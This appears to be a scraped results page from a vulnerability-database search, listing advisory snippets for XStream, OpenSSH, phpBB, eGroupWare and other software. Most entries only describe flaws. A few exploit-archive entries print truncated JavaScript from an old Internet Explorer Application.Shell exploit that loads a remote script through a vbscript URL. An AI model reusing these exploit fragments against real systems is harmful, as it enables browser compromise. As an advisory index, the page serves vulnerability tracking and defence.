Lucene search
K

84 matches found

Prion
Prion
added 2017/04/29 7:59 p.m.18 views

Code injection

XStream through 1.4.9, when a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an xstream.fromXML"" call...

5CVSS7.4AI score0.04928EPSS
Exploits0References9Affected Software2
Cvelist
Cvelist
added 2017/04/29 7:0 p.m.22 views

CVE-2017-7957

XStream through 1.4.9, when a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an xstream.fromXML"" call...

7.3AI score0.04928EPSS
Exploits0References9
CVE
CVE
added 2017/04/29 7:0 p.m.144 views

CVE-2017-7957

CVE-2017-7957 arises from XStream up to version 1.4.9 mishandling attempts to create an instance of the primitive type void during unmarshalling, which can cause a remote application crash when unmarshalling . The vulnerability is documented across multiple sources (e.g., Nessus/IBM/Guardium bull...

7.5CVSS7.3AI score0.04928EPSS
Exploits0References9Affected Software2
BDU FSTEC
BDU FSTEC
added 2017/03/02 12:0 a.m.5 views

The vulnerability of the iOS operating system, which allows a perpetrator to access metadata related to audio recordings

The vulnerability of the Sandbox Profiles component of the iOS operating system is related to the lack of protection for service data. Exploiting this vulnerability can allow a malicious actor, operating remotely, to gain access to metadata of audio recordings through a specially created...

4.3CVSS6.6AI score0.00979EPSS
Exploits0References5Affected Software1
RedHat Linux
RedHat Linux
added 2016/05/10 6:29 p.m.7 views

openssh: possible fallback from untrusted to trusted X11 forwarding

An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, eve...

9.8CVSS7.2AI score0.13736EPSS
Exploits0References4
hackapp
hackapp
added 2016/04/01 9:11 a.m.13 views

Popcorn Time Remote - BSD license, Exported components, External URLs vulnerabilities

HackApp vulnerability scanner discovered that application Popcorn Time Remote published at the 'play' market has multiple vulnerabilities...

0.5AI score
Exploits0References1Affected Software1
Amazon
Amazon
added 2016/03/29 12:0 a.m.60 views

Medium: openssh

Issue Overview: An access flaw was discovered in the OpenSSH client where it did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the loc...

9.8CVSS7.8AI score0.13736EPSS
Exploits0
CNVD
CNVD
added 2015/07/01 12:0 a.m.4 views

Login Bypass Vulnerability in Komax RAS Server Side

Comet iRAS Remote Application Solution is the first remote rapid application access solution in China. A login bypass vulnerability exists on the server side of Comay RAS. Comprehensive exploitation of the vulnerability allows attackers to bypass login authentication and gain administrator...

7.3AI score
Exploits0References1
Check Point Advisories
Check Point Advisories
added 2009/12/28 12:0 a.m.30 views

Citrix Program Neighborhood Agent Arbitrary Shortcut Creation (CVE-2004-1077)

Citrix Presentation Server, formally known as Citrix MetaFrame, is designed for central application deployment. This package allows applications to be deployed and managed by a farm of dedicated servers and allow client machines to access these applications remotely. There exists an arbitrary...

5CVSS6.9AI score0.01165EPSS
Exploits0
Tenable Nessus
Tenable Nessus
added 2009/06/26 12:0 a.m.25 views

BASE < 1.2.5 readRoleCookie() Auth Bypass

The installed version of Basic Analysis and Security Engine BASE on the remote host is affected by an authentication bypass vulnerability. By sending a specially crafted cookie, it may be possible to bypass authentication and gain access to the application. %NASLMINLEVEL 70300 C Tenable Network...

5.6AI score
Exploits0References1
OpenVAS
OpenVAS
added 2008/10/24 12:0 a.m.26 views

Packeteer Web Management Interface Version

It is possible to determine the version of the remote web application. Description : OpenVAS was able to determine the software version of the Packeteer web management interface running on the remote host. OpenVAS Vulnerability Test $Id: packeteerwebversion.nasl 5499 2017-03-06 13:06:09Z teissa $...

0.4AI score
Exploits0
seebug.org
seebug.org
added 2008/06/05 12:0 a.m.22 views

MS Internet Explorer Remote Application.Shell Exploit

No description provided by source. html body script language="Javascript" function InjectedDuringRedirection showModalDialog'md.htm',window,"dialogTop:-10000;dialogLeft:-10000;dialogHeight:1; dialogWidth:1;".location="vbscript:"SCRIPT SRC='http://ip/shellscriptloader.js'/script""; /script...

7.1AI score
Exploits0
OpenVAS
OpenVAS
added 2005/11/03 12:0 a.m.27 views

CodeThatShoppingCart Input Validation Vulnerabilities

The remote version of CodeThat.com ShoppingCart contains an input validation flaw leading to a SQL injection vulnerability. SPDX-FileCopyrightText: 2005 Josh Zlatin-Amishav Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders...

7.5CVSS7.5AI score0.04228EPSS
Exploits3References4
Tenable Nessus
Tenable Nessus
added 2005/05/11 12:0 a.m.15 views

MaxWebPortal < 1.360 Multiple Vulnerabilities

Binary data 2898.prm...

7.5CVSS7.3AI score0.03963EPSS
Exploits2References4
Tenable Nessus
Tenable Nessus
added 2004/11/13 12:0 a.m.16 views

EGroupWare Multiple Vulnerabilities (SQLi, ID)

The remote host is running eGroupWare, a web-based groupware solution. It is reported that versions 1.0.0.006 and older are prone to multiple SQL injection and cross-site scripting flaws. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. include'deprecatednasllevel.inc'; include'compat.inc'; i...

7.5CVSS5.1AI score0.03202EPSS
Exploits2References5
Tenable Nessus
Tenable Nessus
added 2004/09/24 12:0 a.m.26 views

Macromedia JRun Multiple Vulnerabilities

Binary data 2316.prm...

10CVSS7.3AI score0.07104EPSS
Exploits4References12
Tenable Nessus
Tenable Nessus
added 2004/09/13 12:0 a.m.30 views

OpenCA crypto-utils.lib libCheckSignature Function Signature Validation Weakness

The remote host seems to be running an older version of OpenCA. It is reported that OpenCA versions up to and incluing 0.9.1.6 contains a flaw that may lead an attacker to bypass signature verification of a certificate. %NASLMINLEVEL 70300 C Tenable Network Security, Inc...

7.5CVSS5.5AI score0.0209EPSS
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2004/07/26 12:0 a.m.37 views

phpBB < 2.0.10 Multiple XSS

The remote host is running a version of phpBB older than 2.0.10. phpBB contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate user-supplied input in the 'searchauthor' parameter. This version is also vulnerable to an HTTP...

6.8CVSS5.1AI score0.02223EPSS
Exploits2References3
0day.today
0day.today
added 2004/07/09 12:0 a.m.15 views

MS Internet Explorer Remote Application.Shell Exploit

Exploit for unknown platform in category remote exploits ===================================================== MS Internet Explorer Remote Application.Shell Exploit ===================================================== function InjectedDuringRedirection...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2004/07/09 12:0 a.m.27 views

Microsoft Internet Explorer - Remote Application.Shell

Microsoft Internet Explorer - Remote Application.Shell function InjectedDuringRedirection showModalDialog'md.htm',window,"dialogTop:-10000;dialogLeft:-10000;dialogHeight:1; dialogWidth:1;".location="vbscript:"""; setTimeout"myiframe.execScriptInjectedDuringRedirection.toString",100;...

7.5AI score
Exploits0
Rows per page
Query Builder